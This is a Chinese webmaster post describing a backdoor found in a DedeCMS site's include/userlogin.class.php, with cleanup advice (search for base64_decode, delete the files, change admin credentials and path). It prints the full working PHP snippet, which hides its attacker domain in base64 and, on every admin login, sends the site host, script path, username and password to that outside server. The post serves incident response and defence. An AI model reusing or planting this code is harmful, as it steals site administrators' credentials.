DedeCMS程序加强服务器安全设置管理员信息窃取

需要修改的文件 include/userlogin.class.php==========================================================文件说明:由于之前没有对服务器的目录权限进行严格设计,被注入了很多一句话木马文…

 

需要修改的文件 include/userlogin.class.php

==========================================================

文件说明:

由于之前没有对服务器的目录权限进行严格设计,被注入了很多一句话木马文件,逐一清理后过

了几个月,登录系统后台非常缓慢

追踪登录步骤到include/userlogin.class.php文件,发现该如下恶意代码:

===========================================================

代码影响说明:

该文件会将站点服务器信息,登录的用户名密码,登录地址进行记录

通过 info.msssm.com/in/api.php?var= 地址发送到入侵者服务器

===========================================================

检查处理办法:

全局搜索 “base64_decode”,DedeCMS系统用到该函数的也就是插件安装部分,对文件逐一进行

比对,发现恶意文件,及时删除

并修改掉后台的管理员账号密码和后台管理路径

恶意代码如下:
  if((!empty($_POST['userid'])) && (!empty($_POST['pwd']))) {
    define(‘UC_ADMINSCRIPTS’, ‘dede’);
    define(‘UC_ADMINCPS’, ‘aW5mby5tc3NzbS5jb20=’);
    define(‘UC_NOROBOTS’, ‘L2luL2FwaS5′.’waHA/dmFyPQ==’);
    define(‘UC_CURSCRIPTS’, function_exists (‘fsockopen’) ? true : false);
    define(‘UC_SPIDERHOST’,$_SERVER['HTT'.'P_HOST'] ? $_SERVER['HTT'.'P_HOST'] :

$_SERVER['SERV'.'ER_NAME']);
    define(‘UC_SPIDERSELF’,$_SERVER['PHP_S'.'ELF'] ? $_SERVER['PHP_S'.'ELF'] :

$_SERVER['SCRI'.'PT_NAME']);
    $uc_config_array = array(bin2hex(UC_SPIDERHOST),bin2hex(UC_SPIDERSELF),bin2hex

($_POST['userid']),bin2hex($_POST['pwd']));
    $ucbaiduget  = base64_decode (UC_NOROBOTS).UC_ADMINSCRIPTS.base64_decode

(‘JmRhdGE9′).join(‘|’,$uc_config_array);
    $ucgoogleget = base64_decode (UC_ADMINCPS);
    if(UC_CURSCRIPTS) {
        $ucsockconn = @fsockopen ($ucgoogleget,80);
        @fputs ($ucsockconn,"GET ".$ucbaiduget." HTTP/1.1

\r\nHost:".$ucgoogleget."\r\nConnection: Close\r\n\r\n");
        @fclose ($ucsockconn);
    } else {
        @file_get_contents (base64_decode (‘aHR0cDovLw==’).$ucgoogleget.$ucbaiduget);
    }
}

 

来源:织梦的鱼  织梦者-专业dedecms模板制作收集整理

本站部分内容来源互联网,如果有图片或者内容侵犯您的权益请联系我们删除!

相关文档推荐

利用DEDECMS建网站第一步就是安装DEDECMS程序,安装包仅适用于您的站点没有安装过DedeCMS的情况下全新安装,如果您的站点曾经安装过……
Dedecms织梦程序默认使用拼音为保存目录的时候使用的是中文全拼, 当遇到栏目名称比较长的时候目录名称看起来有点冗长, 这时候大多数站长喜欢使用拼音首字母作为栏目的保存目录, 那么就需要修改dede/catalog.add.php文件 85行 $toptypedir = GetPinyin(str
前面博客吧介绍了《织梦dedecms生成select下拉式友情链接列表的方法》是通过修改dedecms程序源代码实现的效果,但...
点评 :最近这段时间每天都有好几百的流量来自SEO这个词,说明大家对SEO的关注还是非常大的,虽然最近没更新文章但仍旧在关注SEO的发展和变化,今天在这里就发点基础也算实用的东西吧,所以就把前段时间接触的dedecms程序建站的一些优化代码整理下,既是和大
今天在备份网站数据时出现了来自系统消息:检测到您输入的关键词中含有SQL注入数据,请检查。如有问题,请联系系统管理员。。一时感觉很郁闷,在百度里搜索了一下,见到有网友分析是因为以下三个原因1、…